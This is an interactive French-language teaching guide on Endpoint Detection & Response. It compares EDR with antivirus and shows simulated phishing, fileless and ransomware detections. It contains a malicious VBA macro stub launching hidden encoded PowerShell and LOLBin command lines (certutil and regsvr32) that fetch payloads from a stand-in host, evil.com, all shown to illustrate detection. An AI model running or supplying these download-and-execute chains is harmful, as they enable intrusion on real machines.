🛡️ Guide Complet

EDR — Endpoint Detection
& Response

Comprendre, visualiser et maîtriser la cybersécurité des endpoints — avec schémas, animations et exemples concrets

6
Modules
4
Scénarios
3
Exemples réels
Interactif
Qu'est-ce qu'un EDR ?
Une solution de sécurité avancée qui surveille, détecte et répond aux menaces sur chaque poste de travail et serveur.
💊
Antivirus classique
Reconnaît les virus connus par leur signature.
Comme reconnaître un criminel par sa photo.
🔬
EDR
Observe les comportements en temps réel.
Comme surveiller les actions d'une personne suspecte, même inconnue.
💡
Analogie parfaite Un antivirus classique = gardien avec une liste de suspects connus. Un EDR = caméra de surveillance intelligente qui analyse chaque comportement, détecte les anomalies, et peut verrouiller une porte automatiquement si quelqu'un se comporte de manière suspecte.
Les 4 fonctions fondamentales
👁️
Détecter
Surveille en continu toutes les activités : processus, fichiers, réseau, mémoire, registre
🚨
Alerter
Génère des alertes contextualisées avec score de criticité et arbre d'attaque
🔍
Investiguer
Reconstruit la chronologie complète d'une attaque (Threat Hunting)
🛑
Répondre
Isole la machine, tue le processus, supprime le fichier — automatiquement ou manuellement
🌐
Corréler
Relie les événements entre plusieurs machines pour voir l'attaque globale
📚
Apprendre
S'améliore avec l'IA/ML pour détecter les nouvelles menaces zero-day
⚠️
Pourquoi l'antivirus seul ne suffit plus ? 97% des malwares modernes sont "fileless" (sans fichier) ou polymorphes. Ils s'exécutent en mémoire, utilisent des outils légitimes Windows (PowerShell, WMI) et changent de signature à chaque infection. L'antivirus basé sur signatures est aveugle face à ces techniques.
Architecture simplifiée d'un EDR
💻 Endpoint
PC / Serveur
📡 Agent EDR
Capteur noyau
🧠 Moteur IA
Analyse comportement
🛑 Réponse
Bloquer / Isoler
☁️ Console SOC
Tableau de bord
🚨 Alerte
Score + contexte
Réseau sans EDR vs avec EDR
Visualisez concrètement la différence lors d'une cyberattaque réelle sur un réseau d'entreprise.

🔴 Réseau SANS EDR Vulnérable

🖥️ Poste RH — Marie
outlook.exenormal
invoice_unpaid.exe⚠ MALWARE
powershell.exe -enc JAB...⚠ SHELL
😱 Aucune alerte générée — attaque invisible !
🖥️ Serveur Fichiers
ransomware_encrypt.exe⚠ ACTIF
*.docx → *.docx.locked💀
😱 Chiffrement en cours — personne ne le sait !
🌐 Trafic réseau
C2: 185.220.101.x:443EXFIL
😱 Données envoyées aux attaquants depuis 3 jours
Résultat :
  • 😱 Détection après 197 jours (moyenne)
  • 💸 Coût moyen : 4,5 millions €
  • 📂 100% des données exfiltrées

🟢 Réseau AVEC EDR Protégé

🖥️ Poste RH — Marie
🔵 Agent EDR actif — surveillance noyau
outlook.exe✓ OK
invoice_unpaid.exe👁 ANALYSÉ
powershell.exe -enc JAB...✓ BLOQUÉ
✅ Alerte T1 générée en 0.3s — SOC notifié
🖥️ Serveur Fichiers
🔵 Comportement anormal détecté
ransomware_encrypt.exeTUÉ
Fichiers protégés✓ INTACT
✅ Machine isolée automatiquement en 1.2s
🌐 Trafic réseau
C2: 185.220.101.x:443BLOQUÉ
✅ IP blacklistée, connexion coupée
Résultat :
  • ⚡ Détection en moins de 1 seconde
  • 💰 Coût évité : 4,5 millions €
  • 🔒 0 donnée compromise
🎯
Ce que l'EDR ajoute concrètement Visibilité complète sur chaque endpoint · Corrélation automatique des événements · Timeline d'attaque reconstruite · Réponse automatisée en secondes · Forensics complet pour l'analyse post-incident · Threat hunting proactif
Simulation d'attaque en direct
Choisissez un scénario et observez étape par étape comment l'EDR détecte et répond à l'attaque.
🔐
Ransomware WannaCry
Critique
🎣
Phishing + Macro VBA
Élevé
🕷️
Mouvement latéral
Élevé
👻
Attaque Fileless
Avancé
🔐
Ransomware WannaCry-style L'attaquant envoie un email avec une pièce jointe malveillante. Une fois ouverte, le ransomware exploite EternalBlue (SMB), se propage sur le réseau et chiffre tous les fichiers.
Anatomie d'un EDR
Cliquez sur chaque composant pour voir son rôle détaillé.
🧩
Agent / Capteur
Installé sur chaque machine. Intercepte les appels système au niveau noyau (kernel hooks).
  • Hooking des API Windows (NtCreateProcess, NtWriteFile…)
  • Surveillance ETW (Event Tracing for Windows)
  • Mini-filtre système de fichiers
  • Interception driver réseau
  • Capture mémoire processus
  • Impact CPU : < 2% en moyenne
🧠
Moteur de détection
IA + règles YARA + IOC matching. Analyse comportementale en temps réel.
  • Machine Learning supervisé (modèles comportementaux)
  • Règles YARA pour signatures fichiers
  • IOC (Indicators of Compromise)
  • TTPs MITRE ATT&CK mapping
  • Sandboxing dynamique
  • Détection anomalies statistiques
☁️
Console Cloud SOC
Dashboard centralisé pour les analystes. Visualisation de toutes les alertes et investigations.
  • Vue unifiée tous endpoints
  • Timeline d'attaque graphique
  • Scoring de criticité automatique
  • Arbre de processus interactif
  • Intégration SIEM/SOAR
  • Rapports conformité
🗄️
Stockage Telémétrie
Enregistre tous les événements pendant 30 à 365 jours pour l'investigation forensique.
  • Millions d'événements/jour/machine
  • Compression et déduplication
  • Recherche full-text ultra-rapide
  • Rétention configurable
  • Export PCAP / raw events
  • Chiffrement au repos
Module de réponse
Exécute les actions correctives automatiquement ou à la demande de l'analyste.
  • Isolation réseau de la machine
  • Kill process (arrêt forcé)
  • Suppression/quarantaine fichier
  • Rollback snapshot
  • Déploiement patch urgent
  • Live response shell (IR)
🌐
Threat Intelligence
Flux externes d'IOC (IPs, hashes, domaines malveillants) mis à jour en temps réel.
  • VirusTotal / AbuseIPDB intégration
  • MISP (Malware Information Sharing)
  • Flux ISAC sectoriels
  • Hash malware (SHA256)
  • Domaines C2 blacklistés
  • CVE / exploit DB
📋 Ce que surveille l'EDR en permanence
Télémétrie collectée sur chaque endpoint
Processus & Système
✦ Création/terminaison processus
✦ Injections de code (DLL, shellcode)
✦ Modifications registre Windows
✦ Accès mémoire inter-processus
✦ Escalade de privilèges
✦ Création services/tâches planifiées
Fichiers & Réseau
✦ Création/modification/suppression fichiers
✦ Connexions réseau sortantes
✦ Résolution DNS suspecte
✦ Transferts de données volumeux
✦ Connexions vers IPs blacklistées
✦ Chiffrement de masse fichiers
EDR vs autres solutions
Comparaison détaillée des différentes couches de sécurité endpoint.
Capacité Antivirus EPP EDR XDR
Détection signatures✓ Oui✓ Oui✓ Oui✓ Oui
Détection comportementale✗ Non~ Partiel✓ Complet✓ Complet
Attaques fileless (sans fichier)✗ Non✗ Non✓ Oui✓ Oui
Zero-day inconnus✗ Non~ Limité✓ Oui (IA)✓ Oui (IA)
Timeline d'attaque✗ Non✗ Non✓ Oui✓ Oui
Investigation forensique✗ Non✗ Non✓ Oui✓ Oui
Réponse automatique~ Basique~ Basique✓ Avancée✓ Avancée
Corrélation multi-sources✗ Non✗ Non~ Endpoint✓ Tout
Threat hunting✗ Non✗ Non✓ Oui✓ Oui
Coût typique/an~30€/poste~60€/poste~120€/poste~200€/poste
✓ Oui    ✗ Non    ~ Partiel/Limité
Les grands EDR du marché
🦅
CrowdStrike Falcon
Leader marché. Architecture 100% cloud. Excellent threat hunting. IA avancée. Coûteux.
🔵
Microsoft Defender for Endpoint
Intégré Windows. Très bon rapport qualité/prix si déjà sous Microsoft 365. E5 requis pour toutes les fonctions.
🌊
SentinelOne
Réponse autonome (pas besoin SOC H24). Rollback 1-click. Très bonne détection fileless.
🔴
Palo Alto Cortex XDR
XDR natif. Corrèle endpoint + réseau + cloud. Idéal si déjà chez Palo Alto.
🕵️
Trend Micro Vision One
Fort sur corrélation. Bon XDR. Utilisé notamment en Asie et entreprises manufacturières.
🇫🇷
HarfangLab (FR)
EDR souverain français. Qualifié ANSSI. Idéal OIV / secteur public. Open source partiellement.
Exemples concrets et cas d'usage
Comment l'EDR réagit face à des attaques réelles documentées.
🎣 Exemple 1 — Email de phishing avec macro VBA
Attaque courante
Marie reçoit un email intitulé "Facture_impayée_2024.docx". Elle l'ouvre. Word lui demande d'activer les macros. La macro exécute un script PowerShell qui télécharge un payload depuis Internet.
' Macro VBA malveillante détectée :
Sub AutoOpen()
  Dim cmd As String
  cmd = "powershell -WindowStyle Hidden -enc JABjA..."
  Shell "cmd.exe /c " & cmd
End Sub
🛡️ Réponse EDR :
T+0s — Macro VBA exécutée dans WINWORD.EXE
T+0.1s — Spawn de cmd.exe détecté comme enfant suspect
T+0.2s — PowerShell avec base64 → comportement T1059 MITRE
T+0.3s — Connexion sortante vers domaine inconnu → bloquée
T+0.3s — WINWORD.EXE + cmd.exe + powershell.exe → tués
T+1s — Alerte Critique envoyée au SOC avec arbre de processus complet
👻 Exemple 2 — Attaque Fileless via LOLBins
Avancé
L'attaquant utilise uniquement des outils Windows légitimes (Living-off-the-Land Binaries) pour se propager. Aucun fichier malveillant sur le disque — invisible pour l'antivirus classique.
# Attaque 100% en mémoire - aucun fichier sur disque
certutil.exe -urlcache -f http://evil.com/payload.b64 C:\tmp\out.b64
certutil.exe -decode C:\tmp\out.b64 C:\tmp\shell.exe
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll
wmic.exe process call create "powershell -c ..."
# certutil.exe + regsvr32.exe + wmic.exe = tous des outils Windows légitimes !
🛡️ Réponse EDR :
Antivirus classique → 0 détection (pas de malware connu)
EDR T+0.4s — certutil.exe accède à une URL distante → comportement anormal T1105
EDR T+0.7s — Chaîne certutil → regsvr32 → wmic = technique LOLBin connue
EDR T+0.8s — Score de risque 97/100 → quarantaine automatique
EDR T+1s — Capture mémoire du processus pour forensics
EDR T+2s — Hash du payload soumis à VirusTotal → confirmé malveillant
🔐 Exemple 3 — Ransomware : détection comportementale
Critique
Un ransomware zero-day inédit commence à chiffrer les fichiers utilisateur. Sa signature est inconnue des antivirus. L'EDR doit détecter le comportement de chiffrement massif.
# Comportement détecté par l'EDR (log interne)
[10:42:31.001] PROC_CREATE unknown_proc.exe (PID:4521)
[10:42:31.100] FILE_RENAME rapport.docx → rapport.docx.XLOCK
[10:42:31.200] FILE_RENAME budget.xlsx → budget.xlsx.XLOCK
[10:42:31.210] FILE_RENAME photo.jpg → photo.jpg.XLOCK
[10:42:31.220] ⚠ ANOMALY: 47 renames/sec → RANSOMWARE PATTERN
[10:42:31.250] ✓ KILL PID:4521 — Machine isolée du réseau
🛡️ Résultat :
Signature inconnue → antivirus = 0 détection
EDR → détecté en 219ms après le 1er fichier chiffré
Seulement 3 fichiers chiffrés sur 50 000 (perte < 0.006%)
Machine isolée, 47 autres endpoints protégés par IOC partagé en 5s
Timeline complète disponible pour les assurances cyber
📚
Framework MITRE ATT&CK Les EDR mappent leurs détections sur le framework MITRE ATT&CK — une base de connaissances de toutes les techniques d'attaque connues (T1059 = execution via scripts, T1055 = injection de processus, T1486 = chiffrement ransomware…). Cela permet de contextualiser chaque alerte dans une chaîne d'attaque (Kill Chain) et d'évaluer la couverture de détection.
🛡️ Guide EDR Interactif · Outil pédagogique de cybersécurité · Tous droits réservés